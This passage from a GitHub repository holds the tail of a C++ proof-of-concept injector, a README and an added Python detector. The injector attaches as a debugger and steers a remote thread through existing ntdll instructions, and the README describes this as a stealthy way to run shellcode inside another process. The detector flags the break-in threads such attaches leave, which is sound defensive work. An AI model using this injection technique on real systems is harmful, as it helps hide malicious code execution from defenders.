        else if (pCurrInstruction->dwInstructionFlags & FLAG_EBX)
        {
            // set ebx
            printf(" mov ebx, 0x%lx\n", pCurrInstruction->dwEbx);
            currentContext.Ebx = pCurrInstruction->dwEbx;
        }
        else if (pCurrInstruction->dwInstructionFlags & FLAG_ECX)
        {
            // set ecx
            printf(" mov ecx, 0x%lx\n", pCurrInstruction->dwEcx);
            currentContext.Ecx = pCurrInstruction->dwEcx;
        }
        else if (pCurrInstruction->dwInstructionFlags & FLAG_EDX)
        {
            // set edx
            printf(" mov edx, 0x%lx\n", pCurrInstruction->dwEdx);
            currentContext.Edx = pCurrInstruction->dwEdx;
        }
        else if (pCurrInstruction->dwInstructionFlags & FLAG_EDI)
        {
            // set edi
            printf(" mov edi, 0x%lx\n", pCurrInstruction->dwEdi);
            currentContext.Edi = pCurrInstruction->dwEdi;
        }
        else if (pCurrInstruction->dwInstructionFlags & FLAG_ESI)
        {
            // set esi
            printf(" mov esi, 0x%lx\n", pCurrInstruction->dwEsi);
            currentContext.Esi = pCurrInstruction->dwEsi;
        }

        // print current instruction address and label
        printf(" 0x%08lX: %s\n", pCurrInstruction->dwInstructionAddr, pCurrInstruction->pLabel);

        // check if this is a 'call' instruction
        if (pCurrInstruction->dwInstructionFlags & FLAG_CALL)
        {
            // set a hardware breakpoint on the first instruction after the 'call'
            // (Dr7 = 1 enables Dr0 as a local, 1-byte, execute breakpoint)
            currentContext.Dr0 = pCurrInstruction->dwInstructionAddr + pCurrInstruction->dwInstructionLength;
            currentContext.Dr7 = 1;
        }
        else
        {
            // single step (trap flag in EFLAGS)
            currentContext.EFlags |= 0x100;
        }

        // move to the next instruction
        dwGlobal_CurrInstruction++;

        if (!SetThreadContext(hTargetThread, &currentContext)) {
            printf("Unable to set thread context\n");
            break;
        }

        // continue execution
        ContinueDebugEvent(DebugEv->dwProcessId, DebugEv->dwThreadId, DBG_CONTINUE);
        CloseHandle(hTargetThread);
        hTargetThread = NULL;
    }

    system("pause");
}

int main(int argc, char** argv)
{
    if (argc < 2) {
        printf("Usage: %s [processToInject]\n", argv[0]);
        exit(1);
    }

    printf("[+] Getting SeDebugPrivilege\n");
    if (!AdjustPrivileges()) {
        printf("[-] Unable to get privileges (run elevated)\n");
        exit(1);
    }

    // widen the argument character by character (ASCII image names only)
    std::string processToInject(argv[1]);
    std::wstring ws(processToInject.begin(), processToInject.end());
    DWORD targetPid = FindProcessId(ws);

    if (targetPid == 0) {
        printf("[-] Unable to find target Pid\n");
        exit(1);
    }

    printf("[+] Scanning ntdll to populate instruction list...\n");

    // scan for instructions
    if (ScanForInstructions() != 0)
    {
        printf("[-] Failed ScanForInstructions\n");
        exit(1);
    }

    printf("[+] Attaching to %s as a debugger\n", argv[1]);

    if (!DebugActiveProcess(targetPid)) {
        printf("[-] Unable to attach the target process (verify privileges)\n");
        exit(1);
    }

    DebuggerMainLoop();

    DebugActiveProcessStop(targetPid);
    if (hTargetThread != NULL) {
        CloseHandle(hTargetThread);
    }
    printf("\nFinished\n");

    return 0;
}
--------------------------------------------------------------------------------
/Media/poc.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Maff1t/InjectNtdllPOC/af666ea1dfb699f8d08994b10038b5cf69fac5ff/Media/poc.gif
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# InjectNTdllPOC



This simple PoC illustrates a possible process injection technique that injects shellcode without reading or writing the memory of the target process, and without creating a remote thread.

## How does it work

This technique is based on [this](https://www.x86matthew.com/view_post?id=windows_no_exec) amazing work, which illustrates how to execute shellcode without allocating any memory, by taking advantage of the code already present in ntdll.
In the article, [@x86matthew](https://twitter.com/x86matthew) uses an exception handler to stop execution after each instruction and modify the EIP register to point to the next ntdll instruction.

Reading this article, I thought that it was possible to do the same in a remote process, exchanging the local exception handler for a debugger that catches every exception raised by the debuggee and modifies the context of the remote thread (using the SetThreadContext API) to point to the next instruction to execute.

In this way it is possible to execute shellcode inside a remote process without allocating or writing any memory inside the target process, and without creating a remote thread to execute the shellcode.

Obviously, the price to pay is the need for administrative privileges in order to attach to the remote process as a debugger.

## Current Limitations

This code is simply a proof-of-concept, and is far from being stable.
Because we don't want to create a remote thread, we have to arbitrarily choose a thread inside the remote process and force it to execute our malicious shellcode.

The main implication of this approach is that when we modify the context of this arbitrary thread, we could make the program crash.
Moreover, with multi-threaded applications, due to thread scheduling, our shellcode could be interrupted before completing its execution.
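From the defender's side, note that the "no remote thread" property holds only for the injector's own code: DebugActiveProcess itself has the system start a break-in thread in the target at ntdll!DbgUiRemoteBreakin, and in practice that thread's initial breakpoint is the first exception the PoC's debugger loop latches onto. The following added example (not part of this repository) flags thread-creation telemetry carrying that signature; the records are constructed to mirror the fields of a Sysmon Event ID 8 entry, and the debugger allow-list is an assumption to tune per environment.

```python
"""Spot the break-in thread that a debugger attach leaves in its target.

Added example for this page, not part of the InjectNtdllPOC repository.
The records below are constructed to mirror the fields of a Sysmon
Event ID 8 (CreateRemoteThread) entry; they are not captured telemetry.
"""
from dataclasses import dataclass
from typing import Iterable, List

# Processes allowed to attach as debuggers. Assumption: tune this per environment.
ALLOWED_DEBUGGERS = {"windbg.exe", "windbgx.exe", "devenv.exe",
                     "x32dbg.exe", "x64dbg.exe", "vsjitdebugger.exe"}

# DebugActiveProcess has the system start a thread in the target at this ntdll
# routine; its breakpoint is the initial exception the PoC's loop latches onto.
BREAKIN_MODULE = "ntdll.dll"
BREAKIN_FUNCTION = "DbgUiRemoteBreakin"


@dataclass(frozen=True)
class RemoteThreadEvent:
    source_pid: int      # SourceProcessId: the process that created the thread
    source_image: str    # SourceImage
    target_pid: int      # TargetProcessId: the process the thread runs in
    target_image: str    # TargetImage
    start_module: str    # StartModule: module containing the start address
    start_function: str  # StartFunction: nearest exported symbol, if resolved


@dataclass(frozen=True)
class Finding:
    target_pid: int
    target_image: str
    debugger_pid: int
    debugger_image: str
    allow_listed: bool


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_debugger_breakin(ev: RemoteThreadEvent) -> bool:
    """True when the remote thread is the attach break-in thread."""
    return (ev.source_pid != ev.target_pid
            and _basename(ev.start_module) == BREAKIN_MODULE
            and ev.start_function == BREAKIN_FUNCTION)


def find_breakin_threads(events: Iterable[RemoteThreadEvent]) -> List[Finding]:
    """Every debugger attach visible in the telemetry, with its source classified."""
    findings = []
    for ev in events:
        if is_debugger_breakin(ev):
            findings.append(Finding(
                target_pid=ev.target_pid,
                target_image=ev.target_image,
                debugger_pid=ev.source_pid,
                debugger_image=ev.source_image,
                allow_listed=_basename(ev.source_image) in ALLOWED_DEBUGGERS,
            ))
    return findings


def unexpected_attaches(events: Iterable[RemoteThreadEvent]) -> List[Finding]:
    """Attaches by processes that are not known debuggers: the ones to alert on."""
    return [f for f in find_breakin_threads(events) if not f.allow_listed]


# Constructed sample: a PoC-style attach, a known-debugger attach, an unrelated remote thread.
SAMPLE_EVENTS = [
    RemoteThreadEvent(4120, r"C:\Users\lab\InjectNtdllPOC.exe",
                      2856, r"C:\Program Files\LabApp\labapp.exe",
                      r"C:\Windows\System32\ntdll.dll", "DbgUiRemoteBreakin"),
    RemoteThreadEvent(5212, r"C:\Tools\windbg.exe",
                      6040, r"C:\Users\lab\myapp.exe",
                      r"C:\Windows\System32\ntdll.dll", "DbgUiRemoteBreakin"),
    RemoteThreadEvent(1044, r"C:\Windows\System32\svchost.exe",
                      3300, r"C:\Windows\System32\taskhostw.exe",
                      r"C:\Windows\System32\ntdll.dll", "RtlUserThreadStart"),
]

if __name__ == "__main__":
    for f in find_breakin_threads(SAMPLE_EVENTS):
        verdict = "known debugger" if f.allow_listed else "UNEXPECTED attach"
        print(f"{verdict}: {f.debugger_image} ({f.debugger_pid}) -> "
              f"{f.target_image} ({f.target_pid})")
```

A second, independent signal on a live host is the debug port the target keeps for the whole run, which CheckRemoteDebuggerPresent on that process reports.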
--------------------------------------------------------------------------------